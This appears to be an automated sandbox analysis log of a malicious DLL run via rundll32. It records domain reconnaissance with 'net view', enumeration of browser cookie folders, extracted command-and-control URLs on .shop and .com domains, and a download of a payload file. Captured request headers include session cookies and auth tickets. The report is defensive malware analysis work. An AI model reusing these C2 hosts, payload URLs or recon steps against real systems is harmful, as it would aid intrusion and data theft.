                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,4_2_00000237C16CA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00000237C16C1A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW,8_3_000001E3B57E16F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA,8_3_000001E3B57E6604
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\Jump to behavior

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.219.28 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.84.207 443Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://jarinamaers.shop/live/
                      Source: Malware configuration extractorURLs: https://startmast.shop/live/
                      Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714166397033Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_00000237C16C8D90
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
                      Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shop
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: jarinamaers.shop
                      Source: global trafficDNS traffic detected: DNS query: grizmotras.com
                      Source: global trafficDNS traffic detected: DNS query: pewwhranet.com
                      Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: ftp://ftp%2desktop.ini
                      Source: rundll32.exeString found in binary or memory: http://dr.f.360.cn/scan
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: http://dr.f.360.cn/scanlist
                      Source: rundll32.exeString found in binary or memory: http://pconf.f.360.cn/safe_update.php
                      Source: rundll32.exeString found in binary or memory: http://pscan.f.360.cn/safe_update.php
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
                      Source: rundll32.exeString found in binary or memory: http://sconf.f.360.cn/client_security_conf
                      Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096149688.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/
                      Source: rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/c
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3704000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/1-0
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/3
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/6
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/My
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/d
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/e
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/o
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/ras.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/p
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/x
                      Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/
                      Source: rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/$
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/V%
                      Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/files/stkm.bin
                      Source: rundll32.exe, 00000008.00000003.3365701357.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365798220.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/files/stkm.binZ&XRr
                      Source: rundll32.exe, 00000008.00000003.3330399474.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/ive/dOIDInfo
                      Source: rundll32.exe, 00000008.00000003.3264129627.000001E3B3709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/l
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/
